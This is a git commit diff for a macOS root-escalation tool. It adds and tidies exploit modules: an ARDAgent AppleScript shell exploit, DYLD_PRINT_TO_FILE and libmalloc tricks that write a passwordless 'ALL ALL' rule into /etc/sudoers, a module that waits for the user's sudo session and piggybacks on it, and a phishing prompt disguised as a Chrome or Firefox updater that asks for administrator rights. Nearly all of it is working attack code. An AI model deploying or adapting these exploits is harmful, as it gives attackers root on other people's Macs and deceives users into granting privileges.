ardagent and cleanup

thehappydinoa · thehappydinoa · commit 1cf5fdf46878 · 2019-03-04T00:36:43.000-05:00
diff --git a/README.md b/README.md
@@ -6,10 +6,12 @@ Tries to use various CVEs to gain sudo or root access. All exploits have an end
 
 ## Exploits
 
+-   CVE-2008-2830
 -   CVE-2015-3760
 -   CVE-2015-5889
 -   CVE-2017-13872
--   Applescript Dynamic Phishing
+-   AppleScript Dynamic Phishing
+-   Sudo Piggyback [Link](https://www.n00py.io/2016/10/privilege-escalation-on-os-x-without-exploits/)
 
 ## Run
 
diff --git a/exploits/__init__.py b/exploits/__init__.py
@@ -1,6 +1,5 @@
 import glob
 import os
 
-modules = glob.glob(os.path.join(os.path.dirname(__file__), "*.py"))
 __all__ = [os.path.basename(f)[:-3]
-           for f in modules if not f.endswith("__init__.py")]
+           for f in glob.glob(os.path.join(os.path.dirname(__file__), "*.py")) if not f.endswith("__init__.py")]
diff --git a/exploits/applescript.py b/exploits/applescript.py
diff --git a/exploits/ardagent.py b/exploits/ardagent.py
@@ -0,0 +1,21 @@
+"""ARDAgent do shell script"""
+from distutils.version import LooseVersion
+
+from .general import DEFAULT_COMMAND, osascript, random_string
+
+__cve__ = "2008-2830"
+__credits__ = "anonymous"
+
+
+def vulnerable(version):
+    """checks vulnerability"""
+    return version <= LooseVersion("10.5.8")
+
+
+def run():
+    """runs exploit"""
+    rand = random_string()
+    payload = """osascript -e 'tell app "ARDAgent" to do shell script "{command}; echo {success}"'""".format(
+        command=DEFAULT_COMMAND, success=rand)
+    response = osascript(payload)
+    return rand in response
diff --git a/exploits/dyld_print_to_file.py b/exploits/dyld_print_to_file.py
@@ -1,3 +1,4 @@
+"""dyld_print_to_file oneliner"""
 import os
 from distutils.version import LooseVersion
 
@@ -6,10 +7,12 @@
 
 
 def vulnerable(version):
+    """checks vulnerability"""
     return version >= LooseVersion("10.10") and version <= LooseVersion("10.10.4")
 
 
 def run():
+    """runs exploit"""
     response = os.system(
         "echo 'echo \"ALL ALL=(ALL) NOPASSWD:ALL\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;")
     return not response == 256
diff --git a/exploits/general.py b/exploits/general.py
@@ -0,0 +1,37 @@
+"""general config and functions"""
+import os
+import uuid
+from plistlib import readPlist
+from subprocess import PIPE, Popen
+from xml.parsers.expat import ExpatError
+
+DEFAULT_COMMAND = "python " + os.getcwd() + "/run_as_sudo.py"
+
+
+def random_string():
+    """generates random string"""
+    return str(uuid.uuid4())[:8]
+
+
+def default_browser():
+    """gets default browser"""
+    try:
+        plist = readPlist(os.path.expanduser(
+            "~") + "/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist")
+    except ExpatError:
+        return
+    handlers = plist.get("LSHandlers")
+    for handler in handlers:
+        scheme = handler.get("LSHandlerURLScheme")
+        if scheme and scheme == "https":
+            return handler.get("LSHandlerRoleAll")
+    return
+
+
+def osascript(command):
+    """runs shell for osascript"""
+    osa = Popen([command], shell=True, stdout=PIPE)
+    response = osa.communicate()[0].strip()
+    if isinstance(response, bytes):
+        return response.decode("utf-8")
+    return response
diff --git a/exploits/libmalloc.py b/exploits/libmalloc.py
@@ -1,5 +1,5 @@
+"""crontab editing using libmalloc"""
 import os
-import sys
 import time
 from distutils.version import LooseVersion
 
@@ -8,22 +8,23 @@
 
 
 def vulnerable(version):
+    """checks vulnerability"""
     return version <= LooseVersion("10.11")
 
 
 def run():
+    """runs exploit"""
     size = os.stat("/etc/sudoers").st_size
 
     env = dict()
     env['MallocLogFile'] = '/etc/crontab'
     env['MallocStackLogging'] = 'yes'
-    env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc / sudoers
-\n\n\n\n\n'
+    env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'
 
     print("Trying /etc/crontab...")
 
-    p = os.fork()
-    if p == 0:
+    pid = os.fork()
+    if pid == 0:
         os.close(1)
         os.close(2)
         os.execve("/usr/bin/rsh", ["rsh", "localhost"], env)
diff --git a/exploits/nopass.py b/exploits/nopass.py
@@ -1,19 +1,21 @@
-import os
+"""root with no password"""
 from distutils.version import LooseVersion
 
-from .applescript import osascript
+from .general import DEFAULT_COMMAND, osascript, random_string
 
 __cve__ = "2017-13872"
 __credits__ = "lemiorhan"
 
 
 def vulnerable(version):
+    """checks vulnerability"""
     return version == LooseVersion("10.13.1")
 
 
 def run():
-    command = "python " + os.getcwd() + "/run_as_sudo.py"
-    payload = """osascript -e 'do shell script "{command}; echo success" user name "root" password "" with administrator privileges'""".format(
-        command=command)
+    """runs exploit"""
+    rand = random_string()
+    payload = """osascript -e 'do shell script "{command}; echo {success}" user name "root" password "" with administrator privileges'""".format(
+        command=DEFAULT_COMMAND, success=rand)
     response = osascript(payload)
-    return "success" in response
+    return rand in response
diff --git a/exploits/phish.py b/exploits/phish.py
@@ -0,0 +1,43 @@
+"""phishes for sudo with AppleScript"""
+from .general import DEFAULT_COMMAND, default_browser, osascript, random_string
+
+try:
+    input = raw_input
+except NameError:
+    pass
+
+__cve__ = ""
+__credits__ = "thehappydinoa"
+
+BROWSERS = {
+    "com.google.chrome": "Google Chrome Updater",
+    "org.mozilla.firefox": "Firefox Updater"
+}
+
+
+def admin_prompt(app=None, prompt="System Update", command="echo hello"):
+    """prompts with administrator privileges"""
+    rand = random_string()
+    if app:
+        payload = """osascript -e 'tell app "{app}" to activate' -e 'tell application "{app}" to do shell script "{command}; echo {success}" with prompt "{prompt}" with administrator privileges'""".format(
+            app=app, prompt=prompt, command=command, success=rand)
+    else:
+        payload = """osascript -e 'do shell script "{command}; echo {success}" with prompt "{prompt}" with administrator privileges'""".format(
+            prompt=prompt, command=command, success=rand)
+    print("Prompting: " + prompt)
+    response = osascript(payload)
+    print(response)
+    return rand in response
+
+
+def vulnerable(version):
+    """checks vulnerability"""
+    return "y" == input("[USER INTERACTION] Do you want to try to phish for sudo? (y/N): ")[0].lower()
+
+
+def run():
+    """runs exploit"""
+    browser = default_browser()
+    if browser and browser in BROWSERS.keys():
+        return admin_prompt(prompt=BROWSERS.get(browser), command=DEFAULT_COMMAND)
+    return admin_prompt(command=DEFAULT_COMMAND)
diff --git a/exploits/piggyback.py b/exploits/piggyback.py
@@ -0,0 +1,34 @@
+"""piggybacks off a sudo command"""
+import os
+import subprocess
+import time
+from distutils.version import LooseVersion
+
+from .general import DEFAULT_COMMAND
+
+__cve__ = ""
+__credits__ = "n00py"
+
+
+def vulnerable(version):
+    """checks vulnerability"""
+    if version < LooseVersion("10.13.0"):
+        return "y" == input("[USER INTERACTION] Do you want to piggyback off sudo (waits until sudo is used)? (y/N): ")[0].lower()
+    return
+
+def run():
+    """runs exploit"""
+    sudo_dir = "/var/db/sudo"
+    subprocess.call(['sudo -K'], shell=True)
+    old_time = time.ctime(os.path.getmtime(sudo_dir))
+    exit_loop = False
+    while exit_loop is False:
+        new_time = time.ctime(os.path.getmtime(sudo_dir))
+        if old_time != new_time:
+            try:
+                subprocess.call(
+                    [DEFAULT_COMMAND], shell=True)
+                exit_loop = True
+            except (OSError, subprocess.CalledProcessError):
+                pass
+    return exit_loop
diff --git a/root.py b/root.py
@@ -11,23 +11,28 @@
 
 
 def main():
+    """main function"""
     version = platform.mac_ver()[0]
-    for exploit in [dyld_print_to_file, libmalloc, nopass, rootpipe, applescript]:
+    for exploit in [ardagent, dyld_print_to_file, libmalloc, nopass, piggyback, phish]:
         if not exploit.vulnerable(LooseVersion(version)):
             print(YELLOWC + "Skipping %s...\n" % exploit.__name__ + ENDC)
             continue
         print(YELLOWC + "Trying %s...\n" % exploit.__name__ + ENDC)
-        result = exploit.run()
+        try:
+            result = exploit.run()
+        except KeyboardInterrupt:
+            continue
         if result:
             print(GREENC + exploit.__name__ + " was successful!" + ENDC)
             return result
         print(REDC + "Failed\n" + ENDC)
     print(REDC + "All Exploits Failed..." + ENDC)
+    return
 
 
 if __name__ == '__main__':
     try:
         main()
     except KeyboardInterrupt:
-        print("Exitting...")
+        print("\nExitting...")
         exit(0)
